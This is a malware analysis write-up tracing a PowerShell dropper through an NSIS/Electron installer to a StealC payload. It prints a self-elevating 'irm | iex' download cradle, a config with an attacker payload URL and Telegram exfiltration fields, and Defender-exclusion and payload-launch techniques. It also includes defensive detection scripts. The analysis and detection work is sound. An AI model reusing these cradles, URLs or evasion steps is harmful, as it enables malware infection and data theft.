
Powershell Dropper - Analysis

04.07.2026 StealC Powershell Electron NSIS StealC Golang
sha256 7cd9942662433becf244379c67a71c53ec3588552e0d0acc7018559a4ddaac44

Overview

The sample is a file named install.ps1.

Stage 1 - Powershell install script

It contains a link to the script itself. When the script is not running as Administrator, it relaunches an elevated PowerShell that downloads the script again via irm and pipes it to iex; it does so to get the user to accept the UAC prompt.

if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)) {
    Start-Process powershell -Verb RunAs -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"irm $ScriptUrl | iex`""
    exit
}
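The relaunch above combines two things a defender can key on in PowerShell script block logging (Event ID 4104): a download cradle piped straight into iex, and self-elevation via Start-Process -Verb RunAs. The following is an added example, not code from the original post; it scans constructed script-block texts (one of them the dropper's own relaunch snippet) and returns the indicators found. The sample inputs and the severity scale are assumptions made for the example.

```python
import re

# Constructed sample script-block texts, shaped like the ScriptBlockText of a 4104 event.
# These are made-up inputs for this example, not log data from the original post.
SAMPLE_BLOCKS = {
    "dropper": (
        'if (-not ([Security.Principal.WindowsPrincipal]'
        '[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole('
        '[Security.Principal.WindowsBuiltinRole]::Administrator)) {\n'
        '  Start-Process powershell -Verb RunAs -ArgumentList '
        '"-NoProfile -ExecutionPolicy Bypass -Command `"irm $ScriptUrl | iex`""\n'
        '  exit\n}'
    ),
    "admin_script": 'Get-Service | Where-Object Status -eq "Running" | Export-Csv svc.csv',
    "cradle_only": 'iwr https://example.invalid/tool.ps1 | iex',
}

# Download cradle: a web fetch whose output is piped into Invoke-Expression on the same line.
CRADLE_RE = re.compile(
    r"\b(irm|Invoke-RestMethod|iwr|Invoke-WebRequest|DownloadString)\b[^|\n]*\|\s*(iex|Invoke-Expression)\b",
    re.IGNORECASE,
)
# Self-elevation: Start-Process with the RunAs verb (this is what triggers the UAC prompt).
RUNAS_RE = re.compile(r"Start-Process\b[^\n]*-Verb\s+RunAs", re.IGNORECASE)
# Execution policy bypass passed to the child PowerShell.
BYPASS_RE = re.compile(r"-ExecutionPolicy\s+Bypass", re.IGNORECASE)


def analyze_script_block(text):
    """Return the list of indicator names found in one script block, in a fixed order."""
    findings = []
    if CRADLE_RE.search(text):
        findings.append("download-cradle-to-iex")
    if RUNAS_RE.search(text):
        findings.append("self-elevation-runas")
    if BYPASS_RE.search(text):
        findings.append("executionpolicy-bypass")
    return findings


def severity(findings):
    """Assumed scale: cradle plus self-elevation is high, any single indicator is medium."""
    if "download-cradle-to-iex" in findings and "self-elevation-runas" in findings:
        return "high"
    if findings:
        return "medium"
    return "none"


if __name__ == "__main__":
    for name, block in SAMPLE_BLOCKS.items():
        found = analyze_script_block(block)
        print(f"{name}: {found} -> {severity(found)}")
```

The cradle pattern deliberately requires the fetch and the iex on the same pipeline, so ordinary administrative scripts that download a file to disk are not flagged; a cradle alone is still worth a look, but a cradle that relaunches itself elevated is the combination this dropper uses.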

The script then downloads the next stage. It is provided as a GitHub Release attached to an otherwise empty repository.

[image: repo-release]

The repository contains the ZIP archive holding Stage 2 and a standalone 7-Zip executable, 7za.exe.

I did not extensively check the authenticity of this file, but it seems genuine.

The script then uses the downloaded 7za.exe to extract the password-protected ZIP archive. The password used is H+h6)d.a.

The file extracted from the archive is Release.exe, which is Stage 2.

Stage 2 - Release.exe

Release.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections

Release.exe seems to be an NSIS installer. Unpacking it with 7z yields an Electron app, whose package.json is:

{
  "name": "installer",
  "version": "3.2.1",
  "description": "Runtime Components",
  "main": "main.js",
  "license": "MIT",
  "allowScripts": {
    "electron": true,
    "electron-builder": true,
    "javascript-obfuscator": true
  }
}

Now this main.js is finally something that we can work with.

Stage 3 - main.js

main.js contains some configuration details that already led me to suspect that this isn't going to be the last stage.

const CONFIG = {
  TG_TOKEN: "",
  TG_CHAT_ID: "",
  PAYLOADS: [{"url":"http://62.60.226.198/uploads/ca089a46f61743cd83884b1577b489ef.exe","name":"payload.exe"}],
  FAKE_REPO: "Runtime Components",
  FAKE_BRANCH: "3.2.1",
  FAKE_FILES_COUNT: 1247,
  FAKE_SIZE_MB: "187.4 MB",
  BUILD_TAG: "",
  INSTALL_DIR: path.join(os.tmpdir(), "Setup", "cache", Date.now().toString()),
  AUTO_CLOSE_AFTER: 60000
};

This config also already reveals the method of data exfiltration: the malware seems to communicate over Telegram (TG_TOKEN and TG_CHAT_ID).

My sample didn't contain any Telegram tokens, which could have helped with further investigation.

The app implements a wide range of functions, for example:

  • take screenshot
  • telegram API (send text/photos)
  • geolocation by ip
  • exclusion (wmi, registry, processes)
  • download to file
  • record seen IPs

The actual control flow is:

app.whenReady().then(async function () {
  if (!isAdmin()) {
    await ensureAdmin();
    return;
  }
  await createHiddenWindow();
  await runSilentDropper();
});

ensureAdmin is again just a UAC prompt. I suspect there was some plan to implement another form of privilege escalation: the Electron app also contains a file elevate.exe, which seems to remain unused.

createHiddenWindow does what its name says and creates a window positioned far off screen.

The malicious execution starts at runSilentDropper. It begins by calling prepareDefender, which loops through all payloads provided in the config (in this case just one) and prepares exclusions for WMI, registry and processes to hide the future payloads from Microsoft Defender.

After preparation, it runs startInstallation, which downloads and executes the payloads, again just one in this sample.
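The exclusions prepareDefender sets up leave a trace: Microsoft Defender logs every configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, with the changed registry value in its "New value:" line. The following is an added example, not code from the original post, that parses constructed 5007-style messages, pulls out the exclusion type and value, and flags the ones that look like what this dropper would create (a path under the user's Temp directory, matching INSTALL_DIR from the config, or a process exclusion given as a bare name). The message texts and the list of user-writable locations are assumptions made for the example.

```python
import re

# Exclusions are written under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\<Kind>\<value>.
EXCL_RE = re.compile(
    r"New value:\s*HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
    r"(Paths|Processes|Extensions)\\(.+?)\s*=\s*0x0",
    re.IGNORECASE,
)

# Assumed list of user-writable locations a legitimate admin rarely excludes wholesale.
USER_WRITABLE = (
    "\\appdata\\local\\temp\\",
    "\\windows\\temp\\",
    "\\appdata\\roaming\\",
    "\\programdata\\",
    "\\users\\public\\",
)


def msg(old, new):
    """Build a message in the shape of a 5007 event body (constructed, not a real log)."""
    return "Old value: %s\r\n\tNew value: %s" % (old, new)


# Constructed sample events: two exclusions the dropper would create, one benign-looking
# path exclusion, and one unrelated Defender setting change.
SAMPLE_5007 = [
    msg("", r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\victim\AppData\Local\Temp\Setup\cache\1712345678901 = 0x0"),
    msg("", r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\payload.exe = 0x0"),
    msg("", r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\SQL Server = 0x0"),
    msg(r"HKLM\...\Real-Time Protection\DisableRealtimeMonitoring = 0x0",
        r"HKLM\...\Real-Time Protection\DisableRealtimeMonitoring = 0x1"),
]


def parse_exclusion(message):
    """Return (kind, value) for an exclusion change, or None for other 5007 events."""
    m = EXCL_RE.search(message)
    if not m:
        return None
    return m.group(1), m.group(2)


def is_suspicious(kind, value):
    v = value.lower()
    if kind.lower() == "processes":
        # A bare file name excludes every process with that name, wherever it runs from.
        return "\\" not in v
    if kind.lower() == "paths":
        return any(loc in v + "\\" for loc in USER_WRITABLE)
    # Extension exclusions are broad by nature; always worth a review.
    return True


def triage(messages):
    """Extract exclusion changes from 5007 messages and mark the suspicious ones."""
    results = []
    for message in messages:
        parsed = parse_exclusion(message)
        if parsed is None:
            continue
        kind, value = parsed
        results.append({"kind": kind, "value": value, "suspicious": is_suspicious(kind, value)})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_5007):
        print(("SUSPICIOUS " if r["suspicious"] else "ok         ") + f'{r["kind"]}: {r["value"]}')
```

On a live host the same data is available without log parsing via Get-MpPreference (ExclusionPath, ExclusionProcess, ExclusionExtension), so a periodic comparison against a known-good baseline catches the same thing; the event-based version has the advantage of also recording when the change happened, which lines up with the rest of the dropper's timeline.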

I found it interesting that executePayload implements 6 different ways to run the malicious payload:

Method      Description
method 1    spawn detached
method 2    cmd /c
method 3    explorer.exe
method 4    rundll32
method 5    PowerShell Start-Process
method 6    VBS launcher (self deleting)

They are all run with a timeout, increasing in increments of 2 seconds.
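That retry chain is itself a detection opportunity: the same executable, sitting under the dropper's <tmp>\Setup\cache\<timestamp>\ directory, gets started by several different parents (cmd.exe, explorer.exe, rundll32.exe, powershell.exe, wscript.exe) within a few seconds. The following is an added example, not code from the original post, that runs over constructed process-creation events in the shape of Sysmon Event ID 1 fields, classifies each launch by the parent binary against the six methods in the table, and reports executables started through more than one launcher. The event data, the 13-digit Date.now() directory name, and the mapping of parents to methods are assumptions made for the example.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# CONFIG.INSTALL_DIR is <tmp>\Setup\cache\<Date.now()>; Date.now() yields a 13-digit
# millisecond timestamp, so the payload ends up in a directory of this shape (assumed).
DROPPER_DIR_RE = re.compile(r"[\\/]Temp[\\/]Setup[\\/]cache[\\/]\d{13}[\\/]", re.IGNORECASE)

# Parent binaries corresponding to methods 2-6 of executePayload; any other parent
# (for example the Electron installer itself) is treated as method 1, a direct spawn.
LAUNCHER_PARENTS = {
    "cmd.exe": "cmd /c",
    "explorer.exe": "explorer.exe",
    "rundll32.exe": "rundll32",
    "powershell.exe": "powershell start-process",
    "wscript.exe": "vbs launcher",
    "cscript.exe": "vbs launcher",
}

PAYLOAD = r"C:\Users\victim\AppData\Local\Temp\Setup\cache\1712345678901\payload.exe"

# Constructed events (made up for this example, not telemetry from the original post):
# four launches of the payload through different launchers, then two unrelated processes.
EVENTS = [
    {"UtcTime": "2026-04-07 10:00:00.000", "ParentImage": r"C:\Users\victim\AppData\Local\Temp\Setup\cache\1712345678901\installer.exe", "Image": PAYLOAD},
    {"UtcTime": "2026-04-07 10:00:02.000", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PAYLOAD},
    {"UtcTime": "2026-04-07 10:00:06.000", "ParentImage": r"C:\Windows\System32\rundll32.exe", "Image": PAYLOAD},
    {"UtcTime": "2026-04-07 10:00:12.000", "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PAYLOAD},
    {"UtcTime": "2026-04-07 10:01:00.000", "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"UtcTime": "2026-04-07 10:02:00.000", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "Image": r"C:\Users\victim\Documents\tool.exe"},
]


def launcher_kind(parent_image):
    """Classify the parent process against the dropper's launch methods."""
    return LAUNCHER_PARENTS.get(PureWindowsPath(parent_image).name.lower(), "direct spawn")


def is_dropper_path(image):
    """True if the executable lives in an INSTALL_DIR-shaped directory."""
    return DROPPER_DIR_RE.search(image) is not None


def triage(events):
    """Map each executable started from a dropper directory to the launcher kinds seen."""
    seen = defaultdict(set)
    for ev in events:
        if is_dropper_path(ev["Image"]):
            seen[ev["Image"]].add(launcher_kind(ev["ParentImage"]))
    return {image: sorted(kinds) for image, kinds in seen.items()}


def fallback_chains(triaged, min_launchers=2):
    """Executables started through several distinct launchers: executePayload's retry behaviour."""
    return [image for image, kinds in triaged.items() if len(kinds) >= min_launchers]


if __name__ == "__main__":
    summary = triage(EVENTS)
    for image, kinds in summary.items():
        print(image, "launched via", ", ".join(kinds))
    print("fallback chains:", fallback_chains(summary))
```

Either half of the logic is noisy on its own (explorer.exe is the parent of every interactive launch, and plenty of installers unpack to Temp); it is the combination, one image in a timestamp-named Temp directory started by several different launchers in quick succession, that is specific to this dropper's behaviour.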

Because of the unbelievable amount of data exfiltration (almost every step sends Telegram API calls to keep the attacker in the loop) and the structure of these messages, I suspect it's some kind of MaaS.

Stage 3 - payload.exe

The next and last stage of the attack is payload.exe.

payload.exe: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections

My plan was to analyze the executable in Ghidra. Further analysis revealed the payload was written and compiled in Go. The amount of bloat and boilerplate made static analysis really difficult, which is why I proceeded with some more research. I am sure there are good ways to dig into a Go binary, but today I was happy with the progress I made. To my luck, I wasn't the first person to find this exact binary.

MD5: 2a0c2ed95964cb00a0f7f7f8e01c573b

I found a dynamic analysis which seems to confirm my take on MaaS, as the sample is flagged as StealC.

Conclusion

I am really happy with how this analysis came together. I really didn't expect that simple PowerShell script to turn into 3 unique stages of malware, but I am glad it did, because I am not sure I would have been confident enough to try it as my first analysis if I had known in advance. I will take from this that I have to do a little more studying about reverse engineering, especially languages like Go.

I reported the GitHub repository, so let's see what comes from that.

Thank you Lucas